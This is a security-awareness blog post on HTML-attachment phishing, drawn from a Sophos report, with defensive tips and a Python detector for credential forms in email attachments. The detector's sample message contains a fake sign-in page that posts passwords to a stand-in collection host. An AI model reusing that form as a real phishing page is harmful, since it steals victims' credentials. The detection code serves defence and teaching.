As if it isn’t tough enough to spot social engineering scams and phishing attacks these days, along comes a devious new threat. A recent post by Sophos Group shares a new phishing scam every business leader and IT pro needs to be aware of.
For context, Sophos explains the three steps scammers typically take when phishing for your digital gold. It’s worth recounting those here:

Step 1: Emails with click-through links
Impersonating a trusted (or recognized) sender, the email includes a link. Once clicked, you’re on the edge of trouble, but not over the edge. That takes you to…

Step 2: Imposter web pages
After you’ve clicked on the email, it’s likely there’s a password page in front of you, and often it looks much like it belongs to the same trusted or recognized source. Just as often, the imposter pages will be on a legitimate website that’s been hacked. If you don’t stop here, you’re opening the door to…

Step 3: Password stealers
Once you’ve entered your private data and pressed submit, it’s likely that data isn’t going where you think it is. Hackers frequently “hide” a password-stealing link within the HTML, taking you to what looks like a trusted URL but is, in fact, a malicious domain.
Step Two With a Twist
Here’s the new wrinkle. While most hackers follow the three steps above, Sophos explains that in step two these hackers didn’t use a link to catch a phish; instead, they used a fake web page that was included with the email as an attachment. Since it isn’t a document that could contain macros or an executable program that can cause an instant disaster, to most people it doesn’t seem dangerous. You might assume that clicking on an attached HTML page will simply open the enclosed web page in the relative safety of your browser, with its (hopefully) strong prevention measures. Here’s where it gets sneaky. Since there isn’t a link in the email, you can’t check it in advance to see if it’s fake. And because the URL in the address bar is what appears to be a harmless-looking local filename, there’s no website name or security certificate you can check. That’s when it’s easy to take Step 3 and bring the house down.

Cyber Safety Phishing Tips
Developers and security specialists will find the Sophos Group’s story worth reading for a deeper technical dive into these new phishing schemes. For everyone else, here is a list of recommended tactics that will help you fight back against phishing.

- Don’t open HTM or HTML attachments unless they are from someone you know, and you are expecting them.
- Don’t log in to web pages that you received in an email. It’s better to reach the page by directly entering the URL in your browser.
- Use two-factor authentication when possible. That gives you one more very strong defense against attacks.
- Change passwords if you think you’ve been attacked. And do it fast so criminals have less time to do their bad deeds.
- Use a solid web antivirus solution. That should stop malware from getting in, and, at the same time, it should check outbound web requests to prevent your data from being stolen.
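As an added example (not from the Sophos write-up or this post), the following Python script shows how a mail gateway or an analyst could flag the attachment variant described above: it parses a constructed .eml message, finds HTML attachments, and reports any that contain a password field together with the host their form posts to. The sample message, host names and function names are assumptions made for the illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample (not a real message): an HTML attachment whose sign-in
# form sends the typed credentials to a host unrelated to the claimed sender.
SAMPLE_EML = """\
From: "Account Team" <noreply@example-bank.test>
Subject: Review your statement
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; name="statement.html"
Content-Disposition: attachment; filename="statement.html"

<html><body><form action="https://collector.invalid/post.php" method="post">
Email <input name="user"> Password <input type="password" name="pass">
<input type="submit" value="Sign in"></form></body></html>
--b1--
"""

class FormFinder(HTMLParser):
    """Records each form's action URL and whether any input is a password field."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def find_credential_forms(raw_eml):
    """Return (attachment name, form host) for each HTML attachment that asks for
    a password; an empty host means the form posts relative to the local file."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        finder = FormFinder()
        finder.feed(part.get_content())
        if finder.has_password:
            findings += [(name, urlsplit(act).hostname or "") for act in finder.actions]
    return findings
```

Because the attachment opens from a local path, the form's action host is the only network destination the victim would ever contact, so it is the value worth comparing against the sender's claimed domain.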